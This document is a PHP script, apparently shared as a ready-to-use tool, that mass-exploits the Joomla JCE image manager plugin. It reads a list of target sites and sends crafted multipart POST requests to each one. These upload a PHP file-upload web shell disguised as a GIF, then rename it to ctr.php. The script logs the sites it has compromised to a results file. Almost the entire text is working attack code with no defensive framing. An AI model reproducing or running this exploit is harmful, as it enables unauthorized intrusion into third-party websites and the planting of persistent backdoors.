
Jce Exploiter By Dr.S4mom

  1. <?php  
  2.         echo "
  3.  _____      _            _______                   _____          
  4. / ____|    | |          |__   __|                 |  __ \          
  5. | |    _   _| |__   ___ _ __| | ___  __ _ _ __ ___ | |__) |_____  __
  6. | |   | | | | '_ \ / _ \ '__| |/ _ \/ _` | '_ ` _ \|  _  // _ \ \/ /
  7. | |___| |_| | |_) |  __/ |  | |  __/ (_| | | | | | | | \ \ (_) >  <
  8. \_____\__, |_.__/ \___|_|  |_|\___|\__,_|_| |_| |_|_|  \_\___/_/\_\
  9.        __/ |                                                      
  10.       |___/                                                        
  11.  
  12. Jce Upload shell Exploiter Coded By Dr.S4mom
  13.  
  14.  
  15.         \n";
  16.        
  17.  
  18. set_time_limit (0);
  19.  
  20. //this is our uploader, you can change it, if you whant
  21. $up = '<form enctype="multipart/form-data" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="512000" />File To Upload : <input name="userfile" type="file" /><input type="submit" value="Upload"/></form><?php $uploaddir = getcwd ()."/";$uploadfile = $uploaddir . basename ($_FILES[\'userfile\'][\'name\']);if (move_uploaded_file ($_FILES[\'userfile\'][\'tmp_name\'], $uploadfile)){echo "File was successfully uploaded.</br>";}else{echo "Upload failed";}?>';
  22.  
  23. //upload directory, you can change it if the directory is not writable
  24. $dir = "/";
  25.  
  26. if (!isset ($argv[1]))
  27.         die ("\nUsage : php {$argv[0]} list.txt\n");
  28.  
  29. if (!file_exists ($argv[1]))
  30.         die ("\n\"{$argv[1]}\" File Not Found !\n");
  31.  
  32. $site = file ($argv[1]);
  33.  
  34.  
  35. $file = fopen ("rslt.txt", "a");
  36. $name = "ctr.php";
  37.  
  38. foreach ($site as $sites)
  39. {
  40.         $sites = trim ($sites);
  41.         jce_upload ($sites, "by Dr.S4mom<br><br>".$up, $dir, $name); //upload as dz.gif & rename to .php
  42.  
  43.         // check if uploaded & renamed :)
  44.         if (preg_match ("/Dr.S4mom/i", @file_get_contents ("$sites/images/stories/$name")))
  45.         {
  46.                 echo "Done -> $sites/images/stories/$name\n";
  47.                 fwrite ($file, "$sites/images/stories/$name\n");
  48.         }
  49.         elseif (preg_match ("/Dr.S4mom/i", @file_get_contents ("$site/images/$name")))
  50.         {
  51.                 echo "Done -> $site/images/$name\n";
  52.                 fwrite ($file, "$sites/images/$name\n");
  53.         }
  54.         elseif (preg_match ("/Dr.S4mom/i", @file_get_contents ("$site/$name")))
  55.         {
  56.                 echo "Done -> $site/$name\n";
  57.                 fwrite ($file, "$sites/$name\n");
  58.         }
  59.         else
  60.                 echo "Not Vuln -> $sites\n";
  61. }
  62.  
  63. fclose ($file);
  64.  
  65. function jce_upload ($site, $content, $up_dir, $rename)
  66. {
  67.         $host = parse_url ($site, PHP_URL_HOST);
  68.         $path = parse_url ($site, PHP_URL_PATH);
  69.  
  70.         if (!$path)
  71.                 $path = "/";
  72.  
  73.         $name = "dz.gif";
  74.  
  75.         $data    = "-----------------------------41184676334\r\n";
  76.         $data   .= "Content-Disposition: form-data; name=\"upload-dir\"\r\n\r\n";
  77.         $data   .= "$up_dir\r\n";
  78.         $data   .= "-----------------------------41184676334\r\n";
  79.         $data   .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"\"\r\n";
  80.         $data   .= "Content-Type: application/octet-stream\r\n\r\n\r\n";
  81.         $data   .= "-----------------------------41184676334\r\n";
  82.         $data   .= "Content-Disposition: form-data; name=\"upload-overwrite\"\r\n\r\n";
  83.         $data   .= "1\r\n";
  84.         $data   .= "-----------------------------41184676334\r\n";
  85.         $data   .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"$name\"\r\n";
  86.         $data   .= "Content-Type: image/gif\r\n\r\n";
  87.         $data   .= "$content\r\n";
  88.         $data   .= "-----------------------------41184676334\r\n";
  89.         $data   .= "0\r\n";
  90.         $data   .= "-----------------------------41184676334\r\n";
  91.         $data   .= "Content-Disposition: form-data; name=\"action\"\r\n\r\n";
  92.         $data   .= "upload\r\n";
  93.         $data   .= "-----------------------------41184676334--";
  94.  
  95.         $packet = "POST $path/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload HTTP/1.0\r\n";
  96.         $packet .= "Host: $host\r\n";
  97.         $packet .= "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0\r\n";
  98.         $packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*\/*;q=0.8\r\n";
  99.         $packet .= "Accept-Language: en-us,en;q=0.5\r\n";
  100.         $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
  101.         $packet .= "Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n";
  102.         $packet .= "Accept-Encoding: deflate\n";
  103.         $packet .= "Connection: Close\r\n";
  104.         $packet .= "Proxy-Connection: close\r\n";
  105.         $packet .= "Content-Length: ".strlen ($data)."\r\n\r\n\r\n";
  106.         $packet .= $data;
  107.         $packet .= "\r\n";
  108.  
  109.         send ($host, $packet);
  110.        
  111.         //folderRename
  112.         //fileRename
  113.         //fileCopy
  114.         $data = "json={\"fn\":\"folderRename\",\"args\":[\"$up_dir".$name."\",\"$rename\"]}";
  115.        
  116.         $packet  = "POST $path/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=156&format=raw HTTP/1.0\r\n";
  117.         $packet .= "Host: $host\r\n";
  118.         $packet .= "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0\r\n";
  119.         $packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
  120.         $packet .= "Accept-Language: en-US,en;q=0.8\r\n";
  121.         $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
  122.         $packet .= "Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n";
  123.         $packet .= "Accept-Encoding: deflate\n";
  124.         $packet .= "X-Request: JSON\r\n";
  125.         $packet .= "Content-Length: ".strlen ($data)."\r\n\r\n";
  126.         $packet .= $data."\r\n\r\n";
  127.        
  128.         send ($host, $packet);
  129. }
  130.  
  131. function send ($host, $packet)
  132. {
  133.         if ($connect = @fsockopen ($host, 80, $x, $y, 3))
  134.         {
  135.                 @fputs ($connect, $packet);
  136.                 @fclose ($connect);
  137.         }
  138. }
  139.  
  140. ?>